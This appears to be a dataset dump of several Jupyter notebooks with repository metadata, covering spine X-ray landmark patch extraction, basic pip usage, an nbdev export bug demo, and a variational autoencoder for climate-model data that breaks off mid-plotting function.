adjusted_landmarks[:,1]*resized_patch.shape[0]\n \n \n for points in adjusted_landmarks:\n cv2.circle(resized_patch,(int(points[0]),int(points[1])), 3, (255,255,255), -1)\n print (points)'''\n \n save_path= split_type+'_patch_images/'+patch_name\n cv2.imwrite(save_path, patch_image)\n \n \n df= df.append(adjusted_landmarks_dict, ignore_index=True) \n \n \n csv_file= split_type+ '_patches_gnd'+ \".csv\"\n df.to_csv(csv_file,index= False)",
"_____no_output_____"
],
[
"def adjust_landmarks_position (patch_image, box_coordinates,x,y,w,h, increase_w =10, increase_h= 10):\n \n box_coordinates = box_coordinates.astype(float)\n\n \n # re-adjust the landmark coordinates in relation to single patch\n box_coordinates[:,0]= (box_coordinates[:,0]-(x-increase_w))/ patch_image.shape[1]\n box_coordinates[:,1]= (box_coordinates[:,1]-(y-increase_h))/ patch_image.shape[0]\n \n return box_coordinates\n \n ",
"_____no_output_____"
],
[
"def crop_patch(image, x,y,w,h, increase_w = 10, increase_h=10):\n img_copy= np.copy(image)\n patch_image = img_copy[y-increase_h:y+h+increase_h,x-increase_w:x+w+increase_w]\n return patch_image\n ",
"_____no_output_____"
]
],
[
[
"### Run this to generate patch images for train and validation, and a correponding csv file with landmark position (groundtruth)",
"_____no_output_____"
]
],
[
[
"ROOT_PATH = \"C:/Users/Brinda Khanal/Documents/Bidur Git Repo/Spine_Challenge/Object detection/\"\ntrain_data_directory = os.path.join(ROOT_PATH, \"data/train/\")\nval_data_directory = os.path.join(ROOT_PATH, \"data/val/\")\ntrain_label_directory=os.path.join(ROOT_PATH, \"data/labels/train/\")\nval_label_directory =os.path.join(ROOT_PATH, \"data/labels/val/\")\n\n\n\nmake_csv_landmark(train_data_directory,os.path.join(train_label_directory,'filenames.csv'),\n os.path.join(train_label_directory,'landmarks.csv'), 'train')\n\n\nmake_csv_landmark(val_data_directory,os.path.join(val_label_directory,'filenames.csv'),\n os.path.join(val_label_directory,'landmarks.csv'), 'val')",
"_____no_output_____"
]
],
[
[
"## Generate Ground Truth for Combined Landmarks detection ##",
"_____no_output_____"
]
],
[
[
"def generate_spine_image(image_directory, filenames_csv, landmarks_csv, save_path, split_type= 'train'):\n \n landmarks_data= pd.read_csv(landmarks_csv,header= None)\n filename_labels= pd.read_csv(filenames_csv,header= None)\n \n\n \n for i, names in enumerate(filename_labels.iloc[:,0]):\n\n img = cv2.imread(image_directory+names)\n print (names)\n #print (\"image shape\",img.shape)\n landmarks = landmarks_data.loc[i].values\n landmark = [[int(round(img.shape[1]*landmarks[m])),int(round(img.shape[0]*landmarks[m+68]))] for m in range (0,68)]\n\n # group 4 corner landmarks to form box\n N=4 \n landmark_corners = [landmark[n:n+N] for n in range(0, len(landmark), N)]\n landmark_corners= np.array(landmark_corners)\n boxes= []\n\n \n blank_image= np.zeros(img.shape,np.uint8)\n for box in landmark_corners:\n x,y,w,h = cv2.boundingRect(box)\n cv2.rectangle(blank_image,(x-50,y-50),(x+w+50,y+h+50),(255,255,255),-1)\n \n kernel = np.ones((10,10),np.uint8)\n dilated = cv2.dilate(blank_image,kernel,iterations = 5)\n \n \n masked_image = cv2.bitwise_and(img,dilated)\n masked = np.ma.array(data= img, mask= ~dilated.astype(bool))\n mean= np.mean(masked)\n print (mean)\n img[dilated==0]=mean\n cv2.imwrite(save_path+split_type+'/'+names,img)\n \n\n ",
"_____no_output_____"
],
[
"ROOT_PATH = \"C:/Users/Brinda Khanal/Documents/Bidur Git Repo/Spine_Challenge/Object detection/\"\ntrain_data_directory = os.path.join(ROOT_PATH, \"data/train/\")\nval_data_directory = os.path.join(ROOT_PATH, \"data/val/\")\ntrain_label_directory=os.path.join(ROOT_PATH, \"data/labels/train/\")\nval_label_directory =os.path.join(ROOT_PATH, \"data/labels/val/\")\nsave_path='C:/Users/Brinda Khanal/Documents/Bidur Git Repo/Spine_Challenge/all landmark estimation/groundtruth for 68 landmarks detection/' \n\n\n\ngenerate_spine_image(train_data_directory,os.path.join(train_label_directory,'filenames.csv'),\n os.path.join(train_label_directory,'landmarks.csv'), save_path,'train')\n\n\ngenerate_spine_image(val_data_directory,os.path.join(val_label_directory,'filenames.csv'),\n os.path.join(val_label_directory,'landmarks.csv'), save_path,'val')",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
e707de9f3d5ba67ee15e1d19077639ec20165274 | 2,897 | ipynb | Jupyter Notebook | Week 1/Section 1/Pip and Python Package Index.ipynb | AjayMukundS/Takenmind-Internship | 98dcceb430b6a035db97e065686bc32df2513299 | [
"MIT"
] | null | null | null | Week 1/Section 1/Pip and Python Package Index.ipynb | AjayMukundS/Takenmind-Internship | 98dcceb430b6a035db97e065686bc32df2513299 | [
"MIT"
] | null | null | null | Week 1/Section 1/Pip and Python Package Index.ipynb | AjayMukundS/Takenmind-Internship | 98dcceb430b6a035db97e065686bc32df2513299 | [
"MIT"
] | null | null | null | 28.126214 | 180 | 0.537107 | [
[
[
"!pip install pandas",
"Requirement already satisfied: pandas in c:\\users\\ajaym\\appdata\\local\\programs\\python\\python38\\lib\\site-packages (1.1.4)\nRequirement already satisfied: numpy>=1.15.4 in c:\\users\\ajaym\\appdata\\local\\programs\\python\\python38\\lib\\site-packages (from pandas) (1.19.3)\nRequirement already satisfied: pytz>=2017.2 in c:\\users\\ajaym\\appdata\\local\\programs\\python\\python38\\lib\\site-packages (from pandas) (2020.1)\nRequirement already satisfied: python-dateutil>=2.7.3 in c:\\users\\ajaym\\appdata\\local\\programs\\python\\python38\\lib\\site-packages (from pandas) (2.8.1)\nRequirement already satisfied: six>=1.5 in c:\\users\\ajaym\\appdata\\local\\programs\\python\\python38\\lib\\site-packages (from python-dateutil>=2.7.3->pandas) (1.15.0)\n"
],
[
"!cd",
"C:\\Users\\ajaym\\Desktop\\Internship\\TakenMind Internship\n"
],
[
"!pip freeze > AllPackages2.txt",
"_____no_output_____"
],
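The frozen file can be used to recreate the same package set elsewhere; a sketch assuming the `AllPackages2.txt` written by the cell above:

```python
# Round-trip: reinstall everything listed in the frozen requirements file
!pip install -r AllPackages2.txt
```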
[
"!dir",
" Volume in drive C has no label.\n Volume Serial Number is 8C76-95FD\n\n Directory of C:\\Users\\ajaym\\Desktop\\Internship\\TakenMind Internship\n\n02-11-2020 11:10 <DIR> .\n02-11-2020 11:10 <DIR> ..\n02-11-2020 11:08 <DIR> .ipynb_checkpoints\n02-11-2020 11:02 927 AllPackages.txt\n02-11-2020 11:09 927 AllPackages2.txt\n02-11-2020 10:29 1,129 Exploring Jupyter Notebook.ipynb\n02-11-2020 11:10 2,043 Untitled.ipynb\n 4 File(s) 5,026 bytes\n 3 Dir(s) 15,121,637,376 bytes free\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code"
]
] |
e707e0ef442e6f1adbca32a733666bd8ce6d4105 | 3,482 | ipynb | Jupyter Notebook | index.ipynb | thakkarparth007/nbdev_all_demo | 7caf2a1ed1e416b4e7b787298c844afc0dd3c35a | [
"Apache-2.0"
] | null | null | null | index.ipynb | thakkarparth007/nbdev_all_demo | 7caf2a1ed1e416b4e7b787298c844afc0dd3c35a | [
"Apache-2.0"
] | null | null | null | index.ipynb | thakkarparth007/nbdev_all_demo | 7caf2a1ed1e416b4e7b787298c844afc0dd3c35a | [
"Apache-2.0"
] | null | null | null | 27.203125 | 294 | 0.559161 | [
[
[
"#hide\nfrom nbdev_all_demo.m1 import *",
"m1 loaded, pi= 3.141592653589793\n"
]
],
[
[
"# nbdev_all_demo\n\n> Demoing the issue at https://github.com/fastai/nbdev/issues/328",
"_____no_output_____"
],
[
"## Summary of the issue",
"_____no_output_____"
],
[
"I've created two nearly identical notebooks: `m1` and `m1_copy`, which both import the math module as `math1` and `math2` respectively, and 'exports' them by default (via \\_all_).\n\nThe only catch is:\n- First I ran nbdev_build_lib for both, which generated `m1.py` and `m1_copy.py` respectively\n- In `m1_copy.py`, I added an extra print statement and then ran `nbdev_upload_lib`\n\nThis added the print statement in `m1_copy.ipynb`, but it also incorrectly replaced the `_all_ = ['math2']` line with `#nbdev_comment _all_ = ['math2']`. This is likely happening because when `nbdev_upload_lib` parses `m1_copy.py`, it doesn't treat `#nbdev_comment` comments specially.\n\nSo, on running `nbdev_build_lib` again (say, I changed some random notebook), the `__all__` variable in `m1_copy.py` becomes `[]`, as there is no (uncommented) `_all_ = ['math2']` statement in the notebook.",
"_____no_output_____"
],
[
"So now, when I try to use `math2` after importing `m1_copy`, it gives an error",
"_____no_output_____"
]
],
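A sketch of the export cell at the heart of the issue (the alias mirrors `m1_copy`; the trailing comments show the corrupted form described above, not code from the repo):

```python
#export
import math as math2
_all_ = ['math2']   # nbdev collects this into the module's __all__

# After the buggy round-trip, the notebook line becomes:
# #nbdev_comment _all_ = ['math2']
# so the next nbdev_build_lib emits __all__ = [] and math2 is no longer exported.
```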
[
[
"from nbdev_all_demo.m1_copy import *",
"m1_copy loaded, pi= 3.141592653589793\nThis is added directly in m1_copy.py\n"
],
[
"math2.pi",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
]
] |
e708050c0a3146188839e2196958c44ffdf336ec | 380,231 | ipynb | Jupyter Notebook | VAE_clim_clim_conv_lin_corr_lat_space.ipynb | GunnarBehrens/CBRAIN-CAM | 1b59b5b4731ada7c077c181b543339412d25e5c3 | [
"MIT"
] | null | null | null | VAE_clim_clim_conv_lin_corr_lat_space.ipynb | GunnarBehrens/CBRAIN-CAM | 1b59b5b4731ada7c077c181b543339412d25e5c3 | [
"MIT"
] | null | null | null | VAE_clim_clim_conv_lin_corr_lat_space.ipynb | GunnarBehrens/CBRAIN-CAM | 1b59b5b4731ada7c077c181b543339412d25e5c3 | [
"MIT"
] | null | null | null | 289.149049 | 166,196 | 0.903545 | [
[
[
"# architecture of VAE$_{clim \\rightarrow clim + conv}$",
"_____no_output_____"
]
],
[
[
"from sklearn.decomposition import PCA\n\nfrom tensorflow.keras.layers import Lambda, Input, Dense\nfrom cbrain.layers import *\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.losses import mse, binary_crossentropy\nfrom tensorflow.keras.utils import plot_model\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.callbacks import LearningRateScheduler,Callback\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport argparse\nimport os\n\n\nimport tensorflow as tf\nfrom cbrain.imports import *\n\nfrom cbrain.utils import *\nimport pandas as ps\n\n# reparameterization trick of VAE \n# instead of sampling from Q(z|X), sample epsilon = N(0,I)\n# z = z_mean + sqrt(var) * epsilon\ndef sampling(args):\n \"\"\"Reparameterization trick by sampling from an isotropic unit Gaussian.\n\n # Arguments\n args (tensor): mean and log of variance of Q(z|X)\n\n # Returns\n z (tensor): sampled latent vector\n based on VAE presented on keras webpage for keras version 1 /\n recent keras VAE version can be seen on\n https://keras.io/examples/generative/vae/\n \"\"\"\n\n z_mean, z_log_var = args\n batch= K.shape(z_mean)[0]\n dim=K.int_shape(z_mean)[1]\n # by default, random_normal has mean = 0 and std = 1.0\n epsilon=K.random_normal(shape=(batch,dim)) # epsilion= random_normal distributed tensor\n sample_prob=z_mean+K.exp(0.5*z_log_var)*epsilon #exp= elementwise exponential\n return sample_prob\n\n# kl annealing to improve reproduction skills of VAE \nklstart = 2\n# number of epochs over which KL scaling is increased from 0 to 1\nkl_annealtime = 5\n\nclass AnnealingCallback(Callback):\n def __init__(self, weight):\n self.weight = weight\n def on_epoch_end (self, epoch, logs={}):\n if epoch > klstart :\n new_weight = min(K.get_value(self.weight) + (1./kl_annealtime), 1.)\n K.set_value(self.weight, new_weight)\n print (\"Current KL Weight is \" + str(K.get_value(self.weight)))\n\n\n# the starting value of weight is 0\n# define it as a keras backend variable\nweight = K.variable(0.)\n\n \noriginal_dim_input=64 # input node size (CAM variables)\n\noriginal_dim_output=int(65+64) # output node size (SP + CAM variables)\n\n\n# network parameters\ninput_shape = (original_dim_input,)\nout_shape=(original_dim_output,)\nintermediate_dim = 463 # nodes in first hidden layers of encoder and last hidden layers of decoder \nbatch_size = 714\nlatent_dim = 5 # latent space dimensions\nepochs = 40 \n \n## Encoder \ninputs =Input(shape=input_shape, name='encoder_input')\nx_0 =Dense(intermediate_dim, activation='relu')(inputs)\nx_1 =Dense(intermediate_dim, activation='relu')(x_0)\nx_2 =Dense(int(np.round(intermediate_dim/2)), activation='relu')(x_1)\nx_3 =Dense(int(np.round(intermediate_dim/4)), activation='relu')(x_2)\nx_4 =Dense(int(np.round(intermediate_dim/8)), activation='relu')(x_3)\nx_5 =Dense(int(np.round(intermediate_dim/16)), activation='relu')(x_4)\n\n\n\nz_mean = Dense(latent_dim, name='z_mean')(x_5)\nz_log_var = Dense(latent_dim, name='z_log_var')(x_5)\n\n\n\n# reparametrization trick\nz = Lambda(sampling, output_shape=(latent_dim), name='z')([z_mean, z_log_var])\n\n# instantiate encoder model\nencoder = Model(inputs, [z_mean, z_log_var, z], name='encoder')\nencoder.summary()\n\n\n## Decoder\ndecoder_inputs =Input(shape=(latent_dim,), name='decoder_input')\nx_1 =Dense(int(np.round(intermediate_dim/16)), activation='relu')(decoder_inputs)\nx_2 =Dense(int(np.round(intermediate_dim/8)), activation='relu')(x_1)\nx_3 =Dense(int(np.round(intermediate_dim/4)), activation='relu')(x_2)\nx_4 
=Dense(int(np.round(intermediate_dim/2)), activation='relu')(x_3)\nx_5 =Dense(intermediate_dim, activation='relu')(x_4)\nx_6 =Dense(intermediate_dim, activation='relu')(x_5)\n\noutputs = Dense(original_dim_output, activation='elu')(x_6)\n\ndecoder = Model(decoder_inputs, outputs, name='decoder')\ndecoder.summary()\n\nemul_outputs=decoder(encoder(inputs)[2])\n\nkl_loss = 1 + z_log_var - K.square(z_mean) - K.exp(z_log_var)\nkl_loss = K.sum(kl_loss, axis=-1)\nkl_loss *= -0.5\nVAE_loss = K.mean(kl_loss*weight)\n\n\nVAE_clim_clim_conv=Model(inputs,emul_outputs)\nVAE_clim_clim_conv.add_loss(VAE_loss)\nVAE_clim_clim_conv.add_metric(kl_loss, name='kl_loss', aggregation='mean')\n\n\n#loading the output normalization scalars for SP variables ( stds over 3 months of SP simulation)\n\nscale_array=ps.read_csv('nn_config/scale_dicts/Scaling_cond_VAE.csv')\n\n\nPHQ_std_surf=scale_array.PHQ_std.values[-1]\n\nTPHYSTND_std_23=scale_array.TPHYSTND_std.values[-1]# for dT/dt we are using the std on level 23 ~ 845 hPa\n\nPRECT_std=scale_array.PRECT_std.values\nFSNS_std=scale_array.FSNS_std.values\nFSNT_std=scale_array.FSNT_std.values\nFLNS_std=scale_array.FLNS_std.values\nFLNT_std=scale_array.FLNT_std.values\n\n# and the CAM variables \nscale_array_2D=ps.read_csv('nn_config/scale_dicts/Scaling_enc_II_range_profiles.csv')\nscale_array_1D=ps.read_csv('nn_config/scale_dicts/Scaling_enc_II_range.csv')\n\nTBP_std_surf=scale_array_2D.TBP_std.values[-1]\n\nQBP_std_surf=scale_array_2D.QBP_std.values[-1]\n\nQ_lat_std_surf=scale_array_1D.Q_lat_std.values\n\nQ_sens_std_surf=scale_array_1D.Q_sens_std.values\n\n\nQ_solar_std_surf=scale_array_1D.Q_sol_std.values\n\nPS_std_surf=scale_array_1D.PS_std.values\n\n\n# defining the scaling dict for the VAE training \n\nscale_dict_II = {\n 'PHQ': 1/PHQ_std_surf, \n 'QBP':1/QBP_std_surf,\n 'TPHYSTND': 1/TPHYSTND_std_23, \n 'TBP':1/TBP_std_surf,\n 'FSNT': 1/FSNT_std, \n 'FSNS': 1/FSNS_std, \n 'FLNT': 1/FLNT_std, \n 'FLNS': 1/FLNS_std, \n 'PRECT': 1/PRECT_std, \n 'LHFLX': 1/Q_lat_std_surf, \n 'SHFLX': 1/Q_sens_std_surf, \n 'SOLIN': 1/Q_solar_std_surf,\n 'PS':1/PS_std_surf\n}\n\nin_vars = ['QBP', 'TBP','PS', 'SOLIN', 'SHFLX', 'LHFLX']\nout_vars = ['PHQ','TPHYSTND','FSNT', 'FSNS', 'FLNT', 'FLNS', 'PRECT','QBP', 'TBP','PS', 'SOLIN', 'SHFLX', 'LHFLX']\n\n## CAM variables\n#QBP = specific humidity\n#TBP = temperature \n#PS = surface pressure \n#SOLIN = solar insolation\n#SHFLX = surface sensible heat flux \n#LHFLX = surface latent heat flux\n\n## SP variables=\n#PHQ = specific humidity tendency \n#TPHYSTND = temperature tendency \n#FSNT = shortwave heat flux model top\n#FSNS = shortwave heat flux model surface \n#FLNT = longwave heat flux model top (OLR)\n#FLNS = longwave heat flux model surface \n#PRECT = precipitation rate \n\n# Takes representative value for PS since purpose is normalization\nPS = 1e5; P0 = 1e5;\nP = P0*hyai+PS*hybi; # Total pressure [Pa]\ndP = P[1:]-P[:-1];\n\n\nfrom cbrain.data_generator import DataGenerator",
"In /pf/b/b309162/work/miniconda3/envs/thunder_cpu_II_plot/lib/python3.8/site-packages/matplotlib/mpl-data/stylelib/_classic_test.mplstyle: \nThe text.latex.preview rcparam was deprecated in Matplotlib 3.3 and will be removed two minor releases later.\nIn /pf/b/b309162/work/miniconda3/envs/thunder_cpu_II_plot/lib/python3.8/site-packages/matplotlib/mpl-data/stylelib/_classic_test.mplstyle: \nThe mathtext.fallback_to_cm rcparam was deprecated in Matplotlib 3.3 and will be removed two minor releases later.\nIn /pf/b/b309162/work/miniconda3/envs/thunder_cpu_II_plot/lib/python3.8/site-packages/matplotlib/mpl-data/stylelib/_classic_test.mplstyle: Support for setting the 'mathtext.fallback_to_cm' rcParam is deprecated since 3.3 and will be removed two minor releases later; use 'mathtext.fallback : 'cm' instead.\nIn /pf/b/b309162/work/miniconda3/envs/thunder_cpu_II_plot/lib/python3.8/site-packages/matplotlib/mpl-data/stylelib/_classic_test.mplstyle: \nThe validate_bool_maybe_none function was deprecated in Matplotlib 3.3 and will be removed two minor releases later.\nIn /pf/b/b309162/work/miniconda3/envs/thunder_cpu_II_plot/lib/python3.8/site-packages/matplotlib/mpl-data/stylelib/_classic_test.mplstyle: \nThe savefig.jpeg_quality rcparam was deprecated in Matplotlib 3.3 and will be removed two minor releases later.\nIn /pf/b/b309162/work/miniconda3/envs/thunder_cpu_II_plot/lib/python3.8/site-packages/matplotlib/mpl-data/stylelib/_classic_test.mplstyle: \nThe keymap.all_axes rcparam was deprecated in Matplotlib 3.3 and will be removed two minor releases later.\nIn /pf/b/b309162/work/miniconda3/envs/thunder_cpu_II_plot/lib/python3.8/site-packages/matplotlib/mpl-data/stylelib/_classic_test.mplstyle: \nThe animation.avconv_path rcparam was deprecated in Matplotlib 3.3 and will be removed two minor releases later.\nIn /pf/b/b309162/work/miniconda3/envs/thunder_cpu_II_plot/lib/python3.8/site-packages/matplotlib/mpl-data/stylelib/_classic_test.mplstyle: \nThe animation.avconv_args rcparam was deprecated in Matplotlib 3.3 and will be removed two minor releases later.\n"
],
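Training details are not shown in this section; a hypothetical setup consistent with the losses defined above (the optimizer choice and MSE reconstruction loss are assumptions, not taken from the repo):

```python
# Total objective = reconstruction MSE + weight * KL, with `weight` ramped
# from 0 to 1 by AnnealingCallback after epoch `klstart`.
VAE_clim_clim_conv.compile(optimizer='adam', loss='mse')
# VAE_clim_clim_conv.fit(..., callbacks=[AnnealingCallback(weight)])
```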
[
"#load the 3month SP test data set \nval_gen_II = DataGenerator(\n data_fn = '../preprocessed_data/1918_train_3_month_OND.nc',\n input_vars = in_vars,\n output_vars = out_vars,\n norm_fn = '../preprocessed_data/000_norm_1_month.nc',\n input_transform = ('mean', 'maxrs'),\n output_transform = scale_dict_II,\n batch_size=8192,\n shuffle=True\n)\n",
"_____no_output_____"
],
[
"VAE_clim_clim_conv.load_weights('./saved_models/VAE_clim_clim_conv/VAE_clim_clim_conv_BN5_40_opt_anneal.h5')",
"_____no_output_____"
],
[
"# define latitude, longitude and time \nlat=np.arange(-90,90,180/64)\nlon=np.arange(-180,180,360/128)\ntime=4415",
"_____no_output_____"
],
[
"#latitutde and longitude of each grid cell as function of time step \nlatit_array=np.reshape((lat.T*np.ones((lat.size,lon.size)).T).T,int(lat.size*lon.size))\nlonit_array=np.reshape(lon*np.ones((lat.size,lon.size)),int(lat.size*lon.size))\n\nlatit_timestep_array=np.reshape((latit_array.T*np.ones((latit_array.size,time)).T),int(latit_array.size*time))\nlonit_timestep_array=np.reshape((lonit_array.T*np.ones((lonit_array.size,time)).T),int(lonit_array.size*time))\n",
"_____no_output_____"
],
[
"#load precomputed 5D latent space of VAE_clim_clim_conv\n\nencoder_resp=np.load('VAE_clim_clim_conv_encoder_pred_3_month_global.npy')",
"_____no_output_____"
],
[
"#load saved predicted output data set for encoder_resp or predict output data using val_gen_II\n\nVAE_resp=np.load('VAE_clim_clim_conv_pred_3_month_global.npy')#val_gen_II.output_transform.inverse_transform(decoder.predict(encoder_resp))",
"_____no_output_____"
]
],
[
[
"swap nodes to seperate latent nodes which drive large-scale varaibility from convective regime latent nodes\n\noriginal latent node 1 → Node 3\n\noriginal latent node 2 → Node 2\n\noriginal latent node 3 → Node 4\n\noriginal latent node 4 → Node 5\n\noriginal latent node 5 → Node 1",
"_____no_output_____"
],
[
"# Compute linear correlation R in space-time between latent nodes and output data set ",
"_____no_output_____"
]
],
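The node swap above amounts to a fixed column permutation of the latent matrix; a sketch assuming the `encoder_resp` array loaded earlier (`perm` is read off the correlation code that follows, where displayed Nodes 1–5 use original latent dimensions 5, 2, 1, 3, 4):

```python
import numpy as np

perm = [4, 1, 0, 2, 3]                  # displayed Node 1..5 <- original latent columns
latent_swapped = encoder_resp[:, perm]  # shape unchanged: (samples, 5)
```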
[
[
"overall_corr_node_0=np.nan* np.zeros(VAE_resp[0].size)\noverall_corr_node_1=np.nan* np.zeros(VAE_resp[0].size)\noverall_corr_node_2=np.nan* np.zeros(VAE_resp[0].size)\noverall_corr_node_3=np.nan* np.zeros(VAE_resp[0].size)\noverall_corr_node_4=np.nan* np.zeros(VAE_resp[0].size)\n\n## compute R for between respective latent nodes and output predictions\n## order of latent nodes swapped \nfor i in tqdm(np.arange(overall_corr_node_0.size)):\n \n overall_corr_node_0[i]=np.corrcoef(encoder_resp[:,4],VAE_resp[:,i])[0,1]\n overall_corr_node_1[i]=np.corrcoef(encoder_resp[:,1],VAE_resp[:,i])[0,1]\n overall_corr_node_2[i]=np.corrcoef(encoder_resp[:,0],VAE_resp[:,i])[0,1]\n overall_corr_node_3[i]=np.corrcoef(encoder_resp[:,2],VAE_resp[:,i])[0,1]\n overall_corr_node_4[i]=np.corrcoef(encoder_resp[:,3],VAE_resp[:,i])[0,1]\n",
"<ipython-input-8-540901828648>:9: TqdmDeprecationWarning: This function will be removed in tqdm==5.0.0\nPlease use `tqdm.notebook.tqdm` instead of `tqdm.tqdm_notebook`\n for i in tqdm(np.arange(overall_corr_node_0.size)):\n"
],
[
"# generate variable list for sub-grid-scale SP varaibles\nout_labels=['dq/dt '+str(np.round(P[0]/100)),\n 'dq/dt '+str(np.round(P[1]/100)),\n 'dq/dt '+str(np.round(P[2]/100)),\n 'dq/dt '+str(np.round(P[3]/100)),\n 'dq/dt '+str(np.round(P[4]/100)),\n 'dq/dt '+str(np.round(P[5]/100)),\n 'dq/dt '+str(np.round(P[6]/100)),\n 'dq/dt '+str(np.round(P[7]/100)),\n 'dq/dt '+str(np.round(P[8]/100)),\n 'dq/dt '+str(np.round(P[9]/100)),\n 'dq/dt '+str(np.round(P[10]/100)),\n 'dq/dt '+str(np.round(P[11]/100)),\n 'dq/dt '+str(np.round(P[12]/100)),\n 'dq/dt '+str(np.round(P[13]/100)),\n 'dq/dt '+str(np.round(P[14]/100)),\n 'dq/dt '+str(np.round(P[15]/100)),\n 'dq/dt '+str(np.round(P[16]/100)),\n 'dq/dt '+str(np.round(P[17]/100)),\n 'dq/dt '+str(np.round(P[18]/100)),\n 'dq/dt '+str(np.round(P[19]/100)),\n 'dq/dt '+str(np.round(P[20]/100)),\n 'dq/dt '+str(np.round(P[21]/100)),\n 'dq/dt '+str(np.round(P[22]/100)),\n 'dq/dt '+str(np.round(P[23]/100)),\n 'dq/dt '+str(np.round(P[24]/100)),\n 'dq/dt '+str(np.round(P[25]/100)),\n 'dq/dt '+str(np.round(P[26]/100)),\n 'dq/dt '+str(np.round(P[27]/100)),\n 'dq/dt '+str(np.round(P[28]/100)),\n 'dq/dt '+str(np.round(P[29]/100)),\n 'dT/dt '+str(np.round(P[0]/100)),'','','', \n 'dT/dt '+str(np.round(P[4]/100)),'','','','',\n 'dT/dt '+str(np.round(P[9]/100)),'','','','', \n 'dT/dt '+str(np.round(P[14]/100)),'','','','',\n 'dT/dt '+str(np.round(P[19]/100)),'','','','',\n 'dT/dt '+str(np.round(P[24]/100)),'','','','',\n 'dT/dt '+str(np.round(P[29]/100)),'Q_sw_top','Q_sw_surf','Q_lw_top','Q_lw_surf','precip']\n\n## and large-scale climate variables of CAM \n\nin_labels=['Q '+str(np.round(P[0]/100)),\n 'Q '+str(np.round(P[1]/100)),\n 'Q '+str(np.round(P[2]/100)),\n 'Q '+str(np.round(P[3]/100)),\n 'Q '+str(np.round(P[4]/100)),\n 'Q '+str(np.round(P[5]/100)),\n 'Q '+str(np.round(P[6]/100)),\n 'Q '+str(np.round(P[7]/100)),\n 'Q '+str(np.round(P[8]/100)),\n 'Q '+str(np.round(P[9]/100)),\n 'Q '+str(np.round(P[10]/100)),\n 'Q '+str(np.round(P[11]/100)),\n 'Q '+str(np.round(P[12]/100)),\n 'Q '+str(np.round(P[13]/100)),\n 'Q '+str(np.round(P[14]/100)),\n 'Q '+str(np.round(P[15]/100)),\n 'Q '+str(np.round(P[16]/100)),\n 'Q '+str(np.round(P[17]/100)),\n 'Q '+str(np.round(P[18]/100)),\n 'Q '+str(np.round(P[19]/100)),\n 'Q '+str(np.round(P[20]/100)),\n 'Q '+str(np.round(P[21]/100)),\n 'Q '+str(np.round(P[22]/100)),\n 'Q '+str(np.round(P[23]/100)),\n 'Q '+str(np.round(P[24]/100)),\n 'Q '+str(np.round(P[25]/100)),\n 'Q '+str(np.round(P[26]/100)),\n 'Q '+str(np.round(P[27]/100)),\n 'Q '+str(np.round(P[28]/100)),\n 'Q '+str(np.round(P[29]/100)),\n 'T '+str(np.round(P[0]/100)),'','','', \n 'T '+str(np.round(P[4]/100)),'','','','',\n 'T '+str(np.round(P[9]/100)),'','','','', \n 'T '+str(np.round(P[14]/100)),'','','','',\n 'T '+str(np.round(P[19]/100)),'','','','',\n 'T '+str(np.round(P[24]/100)),'','','','',\n 'T '+str(np.round(P[29]/100)),'P_surf','Q_sol','Q_sens','Q_lat']\n\n\n\n# add the two list, create one list over entire VAE predictions \n \nall_labels=out_labels+in_labels\n",
"_____no_output_____"
],
[
"def quad_plot_R2_updated(SP_output_corr_node_0_R_2,\n SP_output_corr_node_1_R_2,\n SP_output_corr_node_2_R_2,\n SP_output_corr_node_3_R_2,\n SP_output_corr_node_4_R_2,\n press,labels):\n \n \"\"\"\n author: Gunnar Behrens\n plot squared linear correlation in space-time between latent nodes and VAE_clim_clim_conv predictions\n as vertical profiles in pressure coordinates for 3D variables and retrieve R² space-time values for 2D\n variables\n \n SP_output_corr_node_*_R_2 -- squarred corr coefs of each latent node \n press -- vertical axis in pressure coords\n labels -- predicted variable list\n \n \"\"\"\n \n import pandas as pd \n Press=press/100\n \n c_map=[[0,0,0,1],[1,0,1,1],[0,0,1,1],[0,0.4,0.5,1],[0.6,0.4,0,1]]\n plt.figure(1,(24,9))\n plt.subplot(1,4,1)\n plt.plot(SP_output_corr_node_0_R_2[0:30],Press[0:30],color=c_map[0],\n label='Node 1')\n plt.plot(SP_output_corr_node_1_R_2[0:30],Press[0:30],color=c_map[1],\n label='Node 2')\n plt.plot(SP_output_corr_node_2_R_2[0:30],Press[0:30],color=c_map[2],\n label='Node 3')\n plt.plot(SP_output_corr_node_3_R_2[0:30],Press[0:30],color=c_map[3],\n label='Node 4')\n plt.plot(SP_output_corr_node_4_R_2[0:30],Press[0:30],color=c_map[4],\n label='Node 5')\n plt.title('Specific Humidity Tend.', Fontsize=24)\n plt.legend(fontsize=17,loc=2)\n plt.ylabel('P [hPa]', Fontsize=24)\n plt.xlim([0,1])\n plt.ylim([0,1000])\n plt.xlabel('R²', Fontsize=20)\n\n plt.xticks(Fontsize=16)\n plt.yticks(Fontsize=16)\n\n plt.grid(True)\n inv=plt.gca()\n inv.invert_yaxis()\n \n ax_2=plt.subplot(1,4,2)\n plt.plot(SP_output_corr_node_0_R_2[30:60],Press[0:30],color=c_map[0])\n plt.plot(SP_output_corr_node_1_R_2[30:60],Press[0:30],color=c_map[1])\n plt.plot(SP_output_corr_node_2_R_2[30:60],Press[0:30],color=c_map[2])\n plt.plot(SP_output_corr_node_3_R_2[30:60],Press[0:30],color=c_map[3])\n plt.plot(SP_output_corr_node_4_R_2[30:60],Press[0:30],color=c_map[4])\n plt.xticks(Fontsize=16)\n ax_2.set_yticklabels([])\n plt.xlabel('R²', Fontsize=20)\n\n plt.xlim([0,1])\n plt.ylim([0,1000])\n plt.grid(True)\n \n plt.title('Temperature Tend.', Fontsize=24)\n inv=plt.gca()\n inv.invert_yaxis()\n\n ax_3=plt.subplot(1,4,3)\n plt.plot(SP_output_corr_node_0_R_2[65:95],Press[0:30],color=c_map[0])\n plt.plot(SP_output_corr_node_1_R_2[65:95],Press[0:30],color=c_map[1])\n 